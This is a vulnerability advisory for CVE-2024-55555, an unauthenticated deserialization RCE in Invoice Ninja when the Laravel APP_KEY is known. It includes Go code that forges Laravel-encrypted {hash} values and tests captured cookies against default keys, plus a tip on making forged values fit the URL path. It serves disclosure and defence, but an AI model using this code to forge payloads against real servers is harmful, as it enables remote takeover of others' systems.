CVE-2024-55555
Published: 07 January 2025
Description
Invoice Ninja before 5.10.43 allows remote code execution from a pre-authenticated route when an attacker knows the APP_KEY. This is exacerbated by .env files, available from the product's repository, that have default APP_KEY values. The route/{hash} route defined in the invoiceninja/routes/client.php file can be accessed without authentication. The parameter {hash} is passed to the function decrypt that expects a Laravel ciphered value containing a serialized object. (Furthermore, Laravel contains several gadget chains usable to trigger remote command execution from arbitrary deserialization.) Therefore, an attacker in possession of the APP_KEY is able to fully control a string passed to an unserialize function.
Security Summary
CVE-2024-55555 is a remote code execution vulnerability (CWE-502: Deserialization of Untrusted Data) affecting Invoice Ninja versions prior to 5.10.43. The issue stems from an unauthenticated route at /route/{hash}, defined in invoiceninja/routes/client.php, whose {hash} parameter is passed straight to Laravel's decrypt() helper, which by default unserializes whatever it decrypts. Laravel's Encrypter authenticates ciphertexts with an HMAC derived from APP_KEY, so anyone who knows the key can produce a value that passes the MAC check and decrypts to an attacker-chosen serialized PHP object; known Laravel gadget chains then turn that unserialize() call into code execution. The problem is worsened by default APP_KEY values shipped in the .env example files in the product's GitHub repository. The vulnerability carries a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); note that the route itself requires no login, and the only precondition is knowledge of the APP_KEY.
A remote attacker who obtains the target instance's APP_KEY can exploit this without authentication by sending a crafted {hash} value to the vulnerable route. The value decrypts into a malicious serialized PHP object, and Laravel's deserialization gadget chains turn the resulting unserialize() call into command execution on the server. The low attack complexity and network reachability make exploitation highly practical, especially where a deployment still uses the default APP_KEY from the repository's sample files.
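To make the mechanism concrete, here is an added example (not code from Invoice Ninja, Laravel, or the Synacktiv advisory) that reproduces Laravel's Encrypter format in Go from its documented behaviour: PKCS#7 padding, AES-256-CBC with a random IV, an HMAC-SHA256 over the base64 IV and ciphertext keyed with APP_KEY, and the whole thing wrapped in a base64-encoded JSON document. Encrypt shows what an attacker holding the APP_KEY can build; Decrypt shows what the server does with {hash} before calling unserialize(), and doubles as an offline check for whether a deployment still runs on a default or leaked key. The DemoAppKey and DemoPlaintext constants are constructed for this example; the plaintext is a serialized PHP string, not a gadget chain.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"encoding/json"
	"errors"
	"strings"
)

// Constructed inputs: the key is not an Invoice Ninja default, and the plaintext is the PHP
// serialize() form of a string, a harmless stand-in for the gadget chain an attacker would use.
const DemoAppKey = "base64:QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE="
const DemoPlaintext = `s:23:"https://example.invalid";`

// laravelPayload is the JSON document that Laravel's Encrypter base64-encodes.
type laravelPayload struct {
	IV    string `json:"iv"`
	Value string `json:"value"`
	MAC   string `json:"mac"`
	Tag   string `json:"tag"`
}

// keyBytes turns APP_KEY as written in .env into raw key bytes ("base64:" values are decoded).
func keyBytes(appKey string) ([]byte, error) {
	if strings.HasPrefix(appKey, "base64:") {
		return base64.StdEncoding.DecodeString(strings.TrimPrefix(appKey, "base64:"))
	}
	return []byte(appKey), nil
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	n := int(b[len(b)-1]) // callers guarantee len(b) > 0
	if n == 0 || n > len(b) || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// Encrypt reproduces Laravel's Encrypter::encrypt(): PKCS#7 pad, AES-256-CBC, then HMAC-SHA256 over
// base64(iv)||base64(ciphertext) keyed with APP_KEY. A nil iv draws a random one, as Laravel does.
func Encrypt(appKey string, plaintext, iv []byte) (string, error) {
	key, err := keyBytes(appKey)
	if err != nil || len(key) != 32 {
		return "", errors.New("APP_KEY must decode to 32 bytes for AES-256-CBC")
	}
	if iv == nil {
		iv = make([]byte, aes.BlockSize)
		if _, err := rand.Read(iv); err != nil {
			return "", err
		}
	} else if len(iv) != aes.BlockSize {
		return "", errors.New("iv must be one AES block")
	}
	block, _ := aes.NewCipher(key) // cannot fail for a 32-byte key
	n := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(n)}, n)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	ivB64, valB64 := base64.StdEncoding.EncodeToString(iv), base64.StdEncoding.EncodeToString(ct)
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(ivB64 + valB64))
	js, _ := json.Marshal(laravelPayload{IV: ivB64, Value: valB64, MAC: hex.EncodeToString(mac.Sum(nil))})
	return base64.StdEncoding.EncodeToString(js), nil
}

// Decrypt mirrors decrypt($hash) up to the unserialize() call: parse the payload, verify the MAC, then
// AES-CBC decrypt. A nil error means the MAC verified, which is also the offline test for whether a
// captured {hash} or encrypted cookie was produced under the candidate APP_KEY.
func Decrypt(appKey, hash string) ([]byte, error) {
	key, err := keyBytes(appKey)
	raw, rawErr := base64.StdEncoding.DecodeString(hash)
	var p laravelPayload
	if err != nil || len(key) != 32 || rawErr != nil || json.Unmarshal(raw, &p) != nil {
		return nil, errors.New("the payload is invalid")
	}
	iv, ivErr := base64.StdEncoding.DecodeString(p.IV)
	ct, ctErr := base64.StdEncoding.DecodeString(p.Value)
	if ivErr != nil || ctErr != nil || len(iv) != aes.BlockSize || p.Tag != "" || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("the payload is invalid")
	}
	// The MAC is the only thing standing between the attacker and unserialize(); with APP_KEY it is trivial to forge.
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(p.IV + p.Value))
	if !hmac.Equal([]byte(hex.EncodeToString(mac.Sum(nil))), []byte(p.MAC)) {
		return nil, errors.New("the MAC is invalid")
	}
	block, _ := aes.NewCipher(key)
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}
```

Because Laravel's EncryptCookies middleware uses the same key and format, running Decrypt over a captured XSRF-TOKEN cookie with a candidate APP_KEY tells a tester whether an instance is on a known default before any payload is sent. One practical detail when using the output as a path segment: base64 can contain '/', which would end the {hash} segment, so an attacker simply regenerates with a fresh IV until the value contains none.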
The fix is Invoice Ninja GitHub commit d9302021472c3e7e23bac8c3d5fbec57a5f38f0c, shipped in version 5.10.43, which changes how the route handles the {hash} parameter. The Synacktiv advisory describes the unauthenticated RCE when the APP_KEY is known and recommends updating to the fixed version and regenerating the APP_KEY so that it is no longer a default value. A key that has already been disclosed still lets an attacker forge any Laravel-encrypted value the application accepts, such as cookies, so rotate it even after upgrading; rotation invalidates everything the old key encrypted (sessions, encrypted cookies, stored encrypted data), so plan it accordingly.
Details
- CWE(s)